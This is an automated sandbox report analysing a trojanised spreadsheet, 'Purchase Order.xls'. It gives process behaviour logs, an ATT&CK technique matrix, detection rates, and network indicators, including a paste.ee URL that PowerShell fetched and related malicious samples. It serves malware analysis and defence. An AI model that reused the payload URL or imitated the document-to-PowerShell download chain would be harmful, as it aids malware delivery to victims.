Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 00000002.00000002.2079686823.00000000002EB000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Purchase Order.xls12%VirustotalBrowse
Purchase Order.xls13%ReversingLabsScript.Trojan.Wacatac

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.piriform.c0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
paste.ee
172.67.219.133
truefalse
    high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://paste.ee/r/r87ucfalse
      high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000002.00000002.2086674168.000000001CEE7000.00000002.00000001.sdmpfalse
        high
        http://www.windows.com/pctv.powershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpfalse
          high
          http://investor.msn.compowershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpfalse
              high
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000002.00000002.2079670178.00000000002BE000.00000004.00000020.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.icra.org/vocabulary/.powershell.exe, 00000002.00000002.2086674168.000000001CEE7000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000002.00000002.2080278425.0000000002250000.00000002.00000001.sdmpfalse
                high
                http://crl.entrust.net/server1.crl0powershell.exe, 00000002.00000002.2085961946.000000001B312000.00000004.00000001.sdmpfalse
                  high
                  http://paste.eepowershell.exe, 00000002.00000002.2084310798.0000000003574000.00000004.00000001.sdmpfalse
                    high
                    http://ocsp.entrust.net03powershell.exe, 00000002.00000002.2085961946.000000001B312000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://investor.msn.com/powershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpfalse
                      high
                      https://paste.ee/r/r87ucpowershell.exe, 00000002.00000002.2084501852.0000000003679000.00000004.00000001.sdmpfalse
                        high
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000002.00000002.2085961946.000000001B312000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.piriform.cpowershell.exe, 00000002.00000002.2079670178.00000000002BE000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.%s.comPApowershell.exe, 00000002.00000002.2080278425.0000000002250000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000002.00000002.2079670178.00000000002BE000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://paste.eepowershell.exe, 00000002.00000002.2084501852.0000000003679000.00000004.00000001.sdmpfalse
                          high
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000002.00000002.2086674168.000000001CEE7000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.hotmail.com/oepowershell.exe, 00000002.00000002.2086446900.000000001CD00000.00000002.00000001.sdmpfalse
                            high
                            http://ocsp.entrust.net0Dpowershell.exe, 00000002.00000002.2085990289.000000001B345000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://secure.comodo.com/CPS0powershell.exe, 00000002.00000002.2085896002.000000001B2A0000.00000004.00000001.sdmpfalse
                              high
                              http://crl.entrust.net/2048ca.crl0powershell.exe, 00000002.00000002.2085990289.000000001B345000.00000004.00000001.sdmpfalse
                                high
                                http://www.piriform.com/powershell.exe, 00000002.00000002.2079670178.00000000002BE000.00000004.00000020.sdmpfalse
                                  high

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.21.45.223
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  172.67.219.133
                                  paste.eeUnited States
                                  13335CLOUDFLARENETUSfalse

                                  General Information

                                  Joe Sandbox Version:31.0.0 Emerald
                                  Analysis ID:372800
                                  Start date:22.03.2021
                                  Start time:12:32:14
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 4m 56s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:Purchase Order.xls
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:5
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal76.troj.expl.winXLS@3/7@2/2
                                  EGA Information:Failed
                                  HDC Information:Failed
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .xls
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  12:32:34API Interceptor24x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  104.21.45.223Purchase Order-147000015740.exeGet hashmaliciousBrowse
                                  • paste.ee/r/cUza2
                                  172.67.219.133SecuriteInfo.com.Trojan.MSIL.Basic.8.Gen.4059.exeGet hashmaliciousBrowse
                                  • paste.ee/r/75Qgb
                                  KxpdSnil5T.exeGet hashmaliciousBrowse
                                  • paste.ee/r/DGbIb
                                  6YCl3ATKJw.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  r0QRptqiCl.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  Hjnb15Nuc3.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  JDgYMW0LHW.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  4av8Sn32by.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  kigAlmMyB1.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  afvhKak0Ir.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  T6OcyQsUsY.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  66f8F6WvC1.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  PxwWcmbMC5.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  XnAJZR4NcN.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  PbTwrajNMX.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  I8r7e1pqac.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  wf86K0dpOP.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  6C1MYmrVl1.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  zZp3oXclum.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  52nRNUOy3e.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9
                                  GDGyU4yuvF.exeGet hashmaliciousBrowse
                                  • paste.ee/r/Jcre9

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  paste.eeDirecci#U00f3n de Impuestos y Aduanas Nacionales.vbsGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  YeTkeRWSot.exeGet hashmaliciousBrowse
                                  • 172.67.219.133
                                  PT5vcWvTNr.exeGet hashmaliciousBrowse
                                  • 172.67.219.133
                                  specifica#U021bie.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  XI28934.docGet hashmaliciousBrowse
                                  • 172.67.219.133
                                  SwiftCopy.vbsGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  P18gSPEiT7.exeGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  New Order.docGet hashmaliciousBrowse
                                  • 172.67.219.133
                                  POS AUTO REJECT TRANSACTIONSxlsx.vbsGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  Fecha_ Hora y Lugar.vbsGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  leer citacion juzgado 006 administrativo rama judicial sirvase comparecer a este juzgado.vbsGet hashmaliciousBrowse
                                  • 172.67.219.133
                                  Purchase Order-147000015740.exeGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  a demanda.jsGet hashmaliciousBrowse
                                  • 172.67.219.133
                                  B62672021 PRETORIA.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  XiBlptMzvr.exeGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  Payment.pdf.exeGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  yqwit.exeGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  Fkgnknza2F.exeGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  PREP LIST FOR 04 FEBRUARY 2021.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  mEPx5H8svq.exeGet hashmaliciousBrowse
                                  • 104.21.45.223

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  CLOUDFLARENETUS9311-32400.pdf.exeGet hashmaliciousBrowse
                                  • 104.21.42.218
                                  ab76e3ddfecc8c84fd2179bb40cbe1c535963154c3e6e.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  mj8ejPVt3a.exeGet hashmaliciousBrowse
                                  • 172.67.176.78
                                  Ix40ZgcSxq.exeGet hashmaliciousBrowse
                                  • 104.25.234.53
                                  RFQ MEDICAL EQUIPMENT.docGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  Shipping Documents.exeGet hashmaliciousBrowse
                                  • 23.227.38.74
                                  Po # 6-10331.exeGet hashmaliciousBrowse
                                  • 172.67.176.78
                                  MV Sky Marine_pdf.exeGet hashmaliciousBrowse
                                  • 172.67.161.235
                                  RFQ HAN4323.exeGet hashmaliciousBrowse
                                  • 23.227.38.74
                                  4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                  • 23.227.38.74
                                  MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                  • 104.21.88.100
                                  Drawings_pdf.exeGet hashmaliciousBrowse
                                  • 172.67.176.78
                                  LrYfZ4Moo8.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  LzZcYEPQy6.dllGet hashmaliciousBrowse
                                  • 104.20.184.68
                                  HDFC_Bank_Payment.docGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  SecuriteInfo.com.Trojan.Siggen12.47248.30665.exeGet hashmaliciousBrowse
                                  • 172.67.162.110
                                  SecuriteInfo.com.Trojan.Siggen12.47248.964.exeGet hashmaliciousBrowse
                                  • 172.67.162.110
                                  SecuriteInfo.com.Trojan.Siggen12.47248.16606.exeGet hashmaliciousBrowse
                                  • 172.67.162.110
                                  Scanned032221.exeGet hashmaliciousBrowse
                                  • 162.159.133.233
                                  SecuriteInfo.com.Trojan.Siggen12.47234.30189.exeGet hashmaliciousBrowse
                                  • 172.67.162.110
                                  CLOUDFLARENETUS9311-32400.pdf.exeGet hashmaliciousBrowse
                                  • 104.21.42.218
                                  ab76e3ddfecc8c84fd2179bb40cbe1c535963154c3e6e.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  mj8ejPVt3a.exeGet hashmaliciousBrowse
                                  • 172.67.176.78
                                  Ix40ZgcSxq.exeGet hashmaliciousBrowse
                                  • 104.25.234.53
                                  RFQ MEDICAL EQUIPMENT.docGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  Shipping Documents.exeGet hashmaliciousBrowse
                                  • 23.227.38.74
                                  Po # 6-10331.exeGet hashmaliciousBrowse
                                  • 172.67.176.78
                                  MV Sky Marine_pdf.exeGet hashmaliciousBrowse
                                  • 172.67.161.235
                                  RFQ HAN4323.exeGet hashmaliciousBrowse
                                  • 23.227.38.74
                                  4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                  • 23.227.38.74
                                  MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                  • 104.21.88.100
                                  Drawings_pdf.exeGet hashmaliciousBrowse
                                  • 172.67.176.78
                                  LrYfZ4Moo8.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  LzZcYEPQy6.dllGet hashmaliciousBrowse
                                  • 104.20.184.68
                                  HDFC_Bank_Payment.docGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  SecuriteInfo.com.Trojan.Siggen12.47248.30665.exeGet hashmaliciousBrowse
                                  • 172.67.162.110
                                  SecuriteInfo.com.Trojan.Siggen12.47248.964.exeGet hashmaliciousBrowse
                                  • 172.67.162.110
                                  SecuriteInfo.com.Trojan.Siggen12.47248.16606.exeGet hashmaliciousBrowse
                                  • 172.67.162.110
                                  Scanned032221.exeGet hashmaliciousBrowse
                                  • 162.159.133.233
                                  SecuriteInfo.com.Trojan.Siggen12.47234.30189.exeGet hashmaliciousBrowse
                                  • 172.67.162.110

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  05af1f5ca1b87cc9cc9b25185115607dRFQ MEDICAL EQUIPMENT.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  HDFC_Bank_Payment.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  ORDER 71902.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  Final Invoice.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  2020 Tax .docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  PO451093PO1595_INVOICE.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  IMG_724_Scanned_603.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  Requirements-0.xls .docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  Purchase Order19321.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  5244505.docmGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  5244505.docmGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  IMG_20_Scanned_781 1.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  Purchase Order19320.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  CIF Warsaw, PL.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  Cif Warsaw, PL.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  Company profile.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  order K095805.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  2021 16 03 weekly Report.docGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  7.ppsGet hashmaliciousBrowse
                                  • 104.21.45.223
                                  2021 RFQ Products Required.docGet hashmaliciousBrowse
                                  • 104.21.45.223

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\ACBE0000
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):46679
                                  Entropy (8bit):7.546133164005762
                                  Encrypted:false
                                  SSDEEP:768:zWs78QTdE68eU6sm7eJ3yHn4nyBliB4SpxiPLTgp27J4:z97TTy68etZiJ3G4oiS1fgcN4
